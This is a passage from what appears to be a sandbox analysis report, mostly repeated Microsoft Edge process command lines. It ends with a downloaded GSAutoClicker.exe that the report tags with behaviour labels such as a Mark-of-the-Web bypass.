  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
  2⤵
  PID:1436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:2020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
  2⤵
  PID:3988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
  2⤵
  PID:824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
  2⤵
  PID:1828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1
  2⤵
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6436 /prefetch:1
  2⤵
  PID:868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
  2⤵
  PID:3680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6852 /prefetch:1
  2⤵
  PID:324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
  2⤵
  PID:956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
  2⤵
  PID:2812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7964 /prefetch:1
  2⤵
  PID:2476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7840 /prefetch:1
  2⤵
  PID:1716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8264 /prefetch:1
  2⤵
  PID:3404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8416 /prefetch:1
  2⤵
  PID:4016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8644 /prefetch:1
  2⤵
  PID:5144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8804 /prefetch:1
  2⤵
  PID:5156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9064 /prefetch:1
  2⤵
  PID:5504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9192 /prefetch:1
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9196 /prefetch:1
  2⤵
  PID:5524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7588 /prefetch:1
  2⤵
  PID:5280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7436 /prefetch:1
  2⤵
  PID:5436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8612 /prefetch:1
  2⤵
  PID:5756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7624 /prefetch:1
  2⤵
  PID:5520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7712 /prefetch:1
  2⤵
  PID:5636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8504 /prefetch:1
  2⤵
  PID:5868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8440 /prefetch:1
  2⤵
  PID:1296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
  2⤵
  PID:1008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8756 /prefetch:1
  2⤵
  PID:932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8684 /prefetch:1
  2⤵
  PID:5568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8392 /prefetch:1
  2⤵
  PID:5584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8668 /prefetch:1
  2⤵
  PID:1440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7076 /prefetch:1
  2⤵
  PID:5192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
  2⤵
  PID:4812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:1
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7580 /prefetch:1
  2⤵
  PID:952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8940 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7936 /prefetch:1
  2⤵
  PID:4696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7832 /prefetch:1
  2⤵
  PID:6120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:1
  2⤵
  PID:2872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8308 /prefetch:1
  2⤵
  PID:3540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9432 /prefetch:1
  2⤵
  PID:3804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9480 /prefetch:1
  2⤵
  PID:5688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9508 /prefetch:1
  2⤵
  PID:5700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8616 /prefetch:1
  2⤵
  PID:5792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8840 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8264 /prefetch:8
  2⤵
  PID:5600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10048 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5832
- C:\Users\Admin\Downloads\GSAutoClicker.exe
  "C:\Users\Admin\Downloads\GSAutoClicker.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9576 /prefetch:1
  2⤵
  PID:5060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:1
  2⤵
  PID:3704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7908 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9092 /prefetch:1
  2⤵
  PID:4440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:1
  2⤵
  PID:5580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7576 /prefetch:1
  2⤵
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9032 /prefetch:1
  2⤵
  PID:5568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7352 /prefetch:1
  2⤵
  PID:5368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9284 /prefetch:1
  2⤵
  PID:1516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
  2⤵
  PID:5328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
  2⤵
  PID:5880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7888 /prefetch:1
  2⤵
  PID:740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:1
  2⤵
  PID:1576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
